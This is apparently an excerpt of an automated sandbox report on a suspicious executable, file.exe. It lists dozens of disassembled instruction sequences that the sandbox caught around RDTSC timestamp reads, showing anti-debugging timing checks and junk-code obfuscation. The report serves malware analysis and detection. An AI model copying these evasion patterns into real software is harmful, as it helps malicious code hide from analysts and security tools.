                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A8C2 second address: 108A96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007F0640516B4Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F0640516B38h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push dword ptr fs:[00000000h] 0x00000031 pushad 0x00000032 mov ecx, 224B89CDh 0x00000037 popad 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f clc 0x00000040 mov eax, dword ptr [ebp+122D1489h] 0x00000046 je 00007F0640516B3Ch 0x0000004c add dword ptr [ebp+122D2FC4h], ecx 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push ebp 0x00000057 call 00007F0640516B38h 0x0000005c pop ebp 0x0000005d mov dword ptr [esp+04h], ebp 0x00000061 add dword ptr [esp+04h], 00000019h 0x00000069 inc ebp 0x0000006a push ebp 0x0000006b ret 0x0000006c pop ebp 0x0000006d ret 0x0000006e nop 0x0000006f jne 00007F0640516B44h 0x00000075 push eax 0x00000076 jng 00007F0640516B3Eh 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8D4 second address: 108B8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8D8 second address: 108B8E2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0640516B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090DC8 second address: 1090E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F0640D82068h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 or ebx, dword ptr [ebp+122D370Ah] 0x00000028 jmp 00007F0640D82074h 0x0000002d push 00000000h 0x0000002f jmp 00007F0640D82072h 0x00000034 push 00000000h 0x00000036 and ebx, dword ptr [ebp+122D19CDh] 0x0000003c xchg eax, esi 0x0000003d jmp 00007F0640D8206Ah 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F0640D82077h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8E2 second address: 108B8E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090E4A second address: 1090E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090E4F second address: 1090E55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090E55 second address: 1090E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10920FB second address: 1092101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E72 second address: 1099EB3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0640D82066h 0x00000008 jns 00007F0640D82066h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 jmp 00007F0640D8206Dh 0x00000016 pop edx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a ja 00007F0640D8207Fh 0x00000020 jmp 00007F0640D82079h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DF2E second address: 109DF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F25 second address: 1034F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F0640D8206Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F36 second address: 1034F43 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0640516B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F43 second address: 1034F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0640D82066h 0x0000000a ja 00007F0640D82066h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F55 second address: 1034F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F62 second address: 1034F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F66 second address: 1034F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A38E7 second address: 10A38ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A38ED second address: 10A3918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F0640516B3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jnl 00007F0640516B36h 0x00000014 pop ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 jc 00007F0640516B36h 0x0000001e jnl 00007F0640516B36h 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A3918 second address: 10A391D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4542 second address: 10A4552 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4552 second address: 10A4556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4AA8 second address: 10A4AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9186 second address: 10A918A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A918A second address: 10A91AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0640516B40h 0x0000000b popad 0x0000000c jnp 00007F0640516B58h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A91AB second address: 10A91AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A91AF second address: 10A91B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A91B9 second address: 10A91BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A91BD second address: 10A91C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9988 second address: 10A9998 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9998 second address: 10A99B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0640516B3Dh 0x0000000c push esi 0x0000000d pop esi 0x0000000e jc 00007F0640516B36h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A99B9 second address: 10A99C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0640D82066h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9DB8 second address: 10A9DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA06C second address: 10AA091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82074h 0x00000009 jne 00007F0640D82066h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA091 second address: 10AA095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA095 second address: 10AA0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0640D82066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d js 00007F0640D8208Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F0640D82066h 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA0B2 second address: 10AA0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8EF9 second address: 10A8EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8EFD second address: 10A8F03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8F03 second address: 10A8F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8F09 second address: 10A8F23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8F23 second address: 10A8F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8F2C second address: 10A8F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0640516B36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF3E4 second address: 10AF3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F0640D8206Ch 0x0000000b jp 00007F0640D82066h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF3F9 second address: 10AF3FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF3FD second address: 10AF401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF709 second address: 10AF723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F0640516B36h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF723 second address: 10AF727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF882 second address: 10AF886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA12 second address: 10AFA38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D82072h 0x00000007 jg 00007F0640D82066h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F0640D82066h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA38 second address: 10AFA3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA3C second address: 10AFA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0640D82070h 0x0000000b pushad 0x0000000c jg 00007F0640D82066h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFD40 second address: 10AFD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFD44 second address: 10AFD48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BCC4B second address: 10BCC62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F0640516B36h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078419 second address: 107845E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 032C1694h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F0640D82068h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a stc 0x0000002b push 95284CBCh 0x00000030 jng 00007F0640D8208Ah 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107845E second address: 1078462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078559 second address: 107856D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F0640D82068h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107856D second address: 1078571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078571 second address: 1078575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078575 second address: 10785B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jng 00007F0640516B36h 0x0000000d pop ecx 0x0000000e popad 0x0000000f xchg eax, esi 0x00000010 mov edx, 3C330844h 0x00000015 pushad 0x00000016 sub dword ptr [ebp+1245EFE5h], ebx 0x0000001c jnl 00007F0640516B3Ch 0x00000022 js 00007F0640516B36h 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0640516B44h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078696 second address: 10786A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10786A0 second address: 10786A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10788BF second address: 1078944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F0640D8206Ch 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F0640D82068h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 cld 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F0640D82068h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 xor dl, FFFFFFA5h 0x00000047 nop 0x00000048 push ebx 0x00000049 push ebx 0x0000004a pushad 0x0000004b popad 0x0000004c pop ebx 0x0000004d pop ebx 0x0000004e push eax 0x0000004f pushad 0x00000050 jmp 00007F0640D82079h 0x00000055 push esi 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078D04 second address: 1078D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078D0A second address: 1078D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10790C0 second address: 10790D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0640516B3Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10790D2 second address: 1079111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D82076h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edx, 140CBB15h 0x00000013 lea eax, dword ptr [ebp+1248DBAFh] 0x00000019 add edx, 162EF136h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0640D8206Ch 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079111 second address: 107911B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107911B second address: 107911F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107911F second address: 105D6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, 3F0D5360h 0x00000010 call dword ptr [ebp+12470C42h] 0x00000016 jmp 00007F0640516B49h 0x0000001b je 00007F0640516B5Fh 0x00000021 pushad 0x00000022 jp 00007F0640516B36h 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007F0640516B3Fh 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBC7F second address: 10BBCAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D82074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0640D8206Fh 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBCAC second address: 10BBCD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0640516B3Ah 0x00000012 jno 00007F0640516B36h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBCD2 second address: 10BBCDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBCDD second address: 10BBCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBCE5 second address: 10BBD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82074h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBD04 second address: 10BBD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBFB4 second address: 10BBFBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBFBC second address: 10BBFC1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBFC1 second address: 10BBFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBFC7 second address: 10BC00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 js 00007F0640516B36h 0x0000000c jmp 00007F0640516B40h 0x00000011 jmp 00007F0640516B3Fh 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007F0640516B3Ch 0x00000023 push esi 0x00000024 jl 00007F0640516B36h 0x0000002a pop esi 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC18B second address: 10BC1A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D8206Eh 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC2DF second address: 10BC306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 pushad 0x00000008 jl 00007F0640516B36h 0x0000000e jmp 00007F0640516B47h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC499 second address: 10BC4A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC4A1 second address: 10BC4A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC79F second address: 10BC7CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F0640D82066h 0x00000009 jmp 00007F0640D82075h 0x0000000e pop edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jp 00007F0640D82066h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C019D second address: 10C01A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
